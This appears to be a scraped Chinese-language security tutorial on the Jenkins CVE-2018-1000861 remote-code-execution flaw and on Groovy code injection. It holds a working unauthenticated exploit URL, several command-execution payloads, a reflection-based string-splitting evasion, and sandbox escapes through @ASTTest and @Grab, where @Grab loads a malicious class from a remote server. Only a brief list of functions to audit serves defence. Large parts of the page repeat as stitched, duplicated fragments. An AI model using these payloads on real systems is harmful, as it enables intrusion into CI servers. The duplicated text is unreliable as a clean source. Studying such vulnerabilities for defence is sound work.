Groovy代码注入与Jenkins RCE漏洞分析<\/h1>

0x00 前言<\/h2>
本文从Jenkins RCE漏洞(CVE-2018-1000861)入手，深入分析Groovy代码注入的原理与利用方式，并提供详细的教学内容。<\/p>

0x01 Jenkins RCE漏洞分析(CVE-2018-1000861)<\/h2>

漏洞简介<\/h3>
Jenkins是一个基于Java开发的持续集成工具，CVE-2018-1000861是一个远程代码执行漏洞，利用Jenkins动态路由机制的缺陷绕过ACL限制，结合Groovy代码注入实现无验证RCE。<\/p>

漏洞复现<\/h3>

使用PoC:<\/p>

http:\/\/your-ip:8080\/securityRealm\/user\/admin\/descriptorByName\/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript\/checkScript?sandbox=true&value=public%20class%20x%20%7B%0A%20%20public%20x()%7B%0A%20%20%20%20%22touch%20\/tmp\/mi1k7ea%22.execute()%0A%20%20%7D%0A%7D
<\/code><\/pre>
其他PoC变种:<\/p>
@groovy.transform.ASTTest<\/span>(<\/span>value={<\/span> "touch \/tmp\/mi1k7ea"<\/span>.<\/span>execute<\/span>()<\/span> })<\/span>
<\/span><\/span>class<\/span> Person<\/span>{}<\/span>
<\/span><\/span>
<\/span><\/span>@groovy.transform.ASTTest<\/span>(<\/span>value={<\/span>assert<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"touch \/tmp\/mi1k7ea"<\/span>)})<\/span>
<\/span><\/span>class<\/span> Person<\/span>{}<\/span>
<\/span><\/span>
<\/span><\/span>@GrabConfig<\/span>(<\/span>disableChecksums=<\/span>true<\/span>)<\/span>
<\/span><\/span>@GrabResolver<\/span>(<\/span>name=<\/span>'Exp'<\/span>,<\/span> root=<\/span>'http:\/\/127.0.0.1:8000\/'<\/span>)<\/span>
<\/span><\/span>@Grab<\/span>(<\/span>group=<\/span>'test'<\/span>,<\/span> module=<\/span>'poc'<\/span>,<\/span> version=<\/span>'0'<\/span>)<\/span>
<\/span><\/span>import<\/span> Exp;<\/span>
<\/span><\/span><\/code><\/pre>漏洞原理<\/h3>


Jenkins动态路由机制<\/strong>:<\/p>

基于Stapler框架，以\/<\/code>分隔URL，从jenkins.model.Jenkins<\/code>开始遍历<\/li>
调用public成员变量或getter方法<\/li>
<\/ul>
<\/li>

白名单路由<\/strong>:<\/p>

白名单路径包括\/login<\/code>, \/logout<\/code>, \/securityRealm<\/code>等<\/li>
通过\/securityRealm\/user\/[username]\/descriptorByName\/[descriptor_name]\/<\/code>绕过ACL<\/li>
<\/ul>
<\/li>

RCE Gadget<\/strong>:<\/p>

利用GroovyClassLoader.parseClass()<\/code>进行AST解析<\/li>
通过编译期Meta Programming绕过Groovy沙箱<\/li>
<\/ul>
<\/li>
<\/ol>
0x02 Groovy入门<\/h2>
基本语法<\/h3>
Groovy是JVM上的动态语言，与Java语法相似但更简洁。<\/p>
环境搭建<\/h3>

下载Groovy: http:\/\/groovy-lang.org\/download.html<\/li>
配置IDEA Groovy项目<\/li>
<\/ol>
5种运行方式<\/h3>


groovyConsole图形交互控制台<\/strong><\/p>

终端输入groovyConsole<\/code><\/li>
<\/ul>
<\/li>

groovysh shell命令交互<\/strong><\/p>

终端输入groovysh<\/code><\/li>
<\/ul>
<\/li>

命令行执行Groovy脚本<\/strong><\/p>
groovy script.groovy
<\/span><\/span><\/code><\/pre><\/li>

通过IDE运行Groovy脚本<\/strong><\/p>

直接运行Groovy类<\/li>
<\/ul>
<\/li>

创建Unix脚本<\/strong><\/p>
#!\/usr\/bin\/env groovy<\/span>
<\/span><\/span>println(<\/span>"Hi, "<\/span>+<\/span>args[<\/span>0<\/span>]+<\/span>" welcome to Groovy"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>赋予执行权限后直接运行<\/p>
<\/li>
<\/ol>
0x03 Groovy代码注入<\/h2>
漏洞原理<\/h3>
当外部可控输入Groovy代码或可上传恶意Groovy脚本时，可能导致RCE。<\/p>
命令执行PoC变种<\/h3>
\/\/ 直接命令执行
<\/span><\/span><\/span><\/span>Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc"<\/span>)<\/span>
<\/span><\/span>"calc"<\/span>.<\/span>execute<\/span>()<\/span>
<\/span><\/span>'calc'<\/span>.<\/span>execute<\/span>()<\/span>
<\/span><\/span>"${"<\/span>calc".execute()}"<\/span>
<\/span><\/span>"${'calc'.execute()}"<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 回显型命令执行
<\/span><\/span><\/span><\/span>println "whoami"<\/span>.<\/span>execute<\/span>().<\/span>text<\/span>
<\/span><\/span>println 'whoami'<\/span>.<\/span>execute<\/span>().<\/span>text<\/span>
<\/span><\/span>println "${"<\/span>whoami".execute().text}"<\/span>
<\/span><\/span>println "${'whoami'.execute().text}"<\/span>
<\/span><\/span>def<\/span> cmd =<\/span> "whoami"<\/span>;<\/span>
<\/span><\/span>println "${cmd.execute().text}"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>注入点分析<\/h3>


GroovyShell<\/strong><\/p>
GroovyShell groovyShell =<\/span> new<\/span> GroovyShell();<\/span>
<\/span><\/span>groovyShell.<\/span>evaluate<\/span>(<\/span>"\"calc\".execute()"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

GroovyScriptEngine<\/strong><\/p>
GroovyScriptEngine groovyScriptEngine =<\/span> new<\/span> GroovyScriptEngine(<\/span>""<\/span>);<\/span>
<\/span><\/span>groovyScriptEngine.<\/span>run<\/span>(<\/span>"script.groovy"<\/span>,<\/span> new<\/span> Binding());<\/span>
<\/span><\/span><\/code><\/pre><\/li>

GroovyClassLoader<\/strong><\/p>
GroovyClassLoader groovyClassLoader =<\/span> new<\/span> GroovyClassLoader();<\/span>
<\/span><\/span>Class loadClass =<\/span> groovyClassLoader.<\/span>parseClass<\/span>(<\/span>new<\/span> File(<\/span>"script.groovy"<\/span>));<\/span>
<\/span><\/span>GroovyObject groovyObject =<\/span> (<\/span>GroovyObject)<\/span> loadClass.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>groovyObject.<\/span>invokeMethod<\/span>(<\/span>"main"<\/span>,<\/span>""<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

ScriptEngine<\/strong><\/p>
ScriptEngine groovyEngine =<\/span> new<\/span> ScriptEngineManager().<\/span>getEngineByName<\/span>(<\/span>"groovy"<\/span>);<\/span>
<\/span><\/span>groovyEngine.<\/span>eval<\/span>(<\/span>"\"calc\".execute()"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x04 Bypass技巧<\/h2>
反射机制和字符串拼接<\/h3>
import<\/span> java.lang.reflect.Method;<\/span>
<\/span><\/span>Class<?><\/span> rt =<\/span> Class.<\/span>forName<\/span>(<\/span>"java.la"<\/span> +<\/span> "ng.Run"<\/span> +<\/span> "time"<\/span>);<\/span>
<\/span><\/span>Method gr =<\/span> rt.<\/span>getMethod<\/span>(<\/span>"getR"<\/span> +<\/span> "untime"<\/span>);<\/span>
<\/span><\/span>Method ex =<\/span> rt.<\/span>getMethod<\/span>(<\/span>"ex"<\/span> +<\/span> "ec"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>ex.<\/span>invoke<\/span>(<\/span>gr.<\/span>invoke<\/span>(<\/span>null<\/span>),<\/span> "ca"<\/span> +<\/span> "lc"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>Groovy沙箱绕过<\/h3>


@AST注解执行断言<\/strong><\/p>
this<\/span>.<\/span>class<\/span>.<\/span>classLoader<\/span>.<\/span>parseClass<\/span>(<\/span>'''
<\/span><\/span><\/span>    @groovy.transform.ASTTest(value={
<\/span><\/span><\/span>        assert Runtime.getRuntime().exec("calc")
<\/span><\/span><\/span>    })
<\/span><\/span><\/span>    def x
<\/span><\/span><\/span>'''<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

@Grab注解加载远程恶意类<\/strong><\/p>

编写恶意Exp类(构造函数中包含RCE代码)<\/li>
打包为JAR并托管在Web服务器<\/li>
使用PoC:
this<\/span>.<\/span>class<\/span>.<\/span>classLoader<\/span>.<\/span>parseClass<\/span>(<\/span>'''
<\/span><\/span><\/span>    @GrabConfig(disableChecksums=true)
<\/span><\/span><\/span>    @GrabResolver(name='Exp', root='http:\/\/127.0.0.1:8000\/')
<\/span><\/span><\/span>    @Grab(group='test', module='poc', version='0')
<\/span><\/span><\/span>    import Exp;
<\/span><\/span><\/span>'''<\/span>)<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
0x05 排查方法<\/h2>
检查以下关键类和函数:<\/p>



关键类<\/th>
关键函数<\/th>
<\/tr>
<\/thead>


groovy.lang.GroovyShell<\/td>
evaluate<\/td>
<\/tr>

groovy.util.GroovyScriptEngine<\/td>
run<\/td>
<\/tr>

groovy.lang.GroovyClassLoader<\/td>
parseClass<\/td>
<\/tr>

javax.script.ScriptEngine<\/td>
eval<\/td>
<\/tr>
<\/tbody>
<\/table>
0x06 参考<\/h2>

Hacking Jenkins Part 1 - Play with Dynamic Routing<\/li>
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!<\/li>
Jenkins RCE分析（CVE-2018-1000861分析）<\/li>
Jenkins groovy scripts for read teamers and penetration testers<\/li>
<\/ol>

关键类<\/th>	关键函数<\/th> <\/tr> <\/thead>
groovy.lang.GroovyShell<\/td>	evaluate<\/td> <\/tr>
groovy.util.GroovyScriptEngine<\/td>	run<\/td> <\/tr>
groovy.lang.GroovyClassLoader<\/td>	parseClass<\/td> <\/tr>
javax.script.ScriptEngine<\/td>	eval<\/td> <\/tr> <\/tbody> <\/table> 0x06 参考<\/h2> Hacking Jenkins Part 1 - Play with Dynamic Routing<\/li> Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!<\/li> Jenkins RCE分析（CVE-2018-1000861分析）<\/li> Jenkins groovy scripts for read teamers and penetration testers<\/li> <\/ol>

Groovy代码注入与Jenkins RCE漏洞分析<\/h1>

0x00 前言<\/h2> 本文从Jenkins RCE漏洞(CVE-2018-1000861)入手，深入分析Groovy代码注入的原理与利用方式，并提供详细的教学内容。<\/p>

0x01 Jenkins RCE漏洞分析(CVE-2018-1000861)<\/h2>

漏洞简介<\/h3> Jenkins是一个基于Java开发的持续集成工具，CVE-2018-1000861是一个远程代码执行漏洞，利用Jenkins动态路由机制的缺陷绕过ACL限制，结合Groovy代码注入实现无验证RCE。<\/p>

0x02 Groovy入门<\/h2>

基本语法<\/h3> Groovy是JVM上的动态语言，与Java语法相似但更简洁。<\/p>

0x03 Groovy代码注入<\/h2>

漏洞原理<\/h3> 当外部可控输入Groovy代码或可上传恶意Groovy脚本时，可能导致RCE。<\/p>

0x04 Bypass技巧<\/h2>

0x06 参考<\/h2> Hacking Jenkins Part 1 - Play with Dynamic Routing<\/li> Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!<\/li> Jenkins RCE分析（CVE-2018-1000861分析）<\/li> Jenkins groovy scripts for read teamers and penetration testers<\/li> <\/ol>

0x00 前言<\/h2>
本文从Jenkins RCE漏洞(CVE-2018-1000861)入手，深入分析Groovy代码注入的原理与利用方式，并提供详细的教学内容。<\/p>

漏洞简介<\/h3>
Jenkins是一个基于Java开发的持续集成工具，CVE-2018-1000861是一个远程代码执行漏洞，利用Jenkins动态路由机制的缺陷绕过ACL限制，结合Groovy代码注入实现无验证RCE。<\/p>

基本语法<\/h3>
Groovy是JVM上的动态语言，与Java语法相似但更简洁。<\/p>

漏洞原理<\/h3>
当外部可控输入Groovy代码或可上传恶意Groovy脚本时，可能导致RCE。<\/p>

0x06 参考<\/h2>

Hacking Jenkins Part 1 - Play with Dynamic Routing<\/li>
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!<\/li>
Jenkins RCE分析（CVE-2018-1000861分析）<\/li>
Jenkins groovy scripts for read teamers and penetration testers<\/li> <\/ol>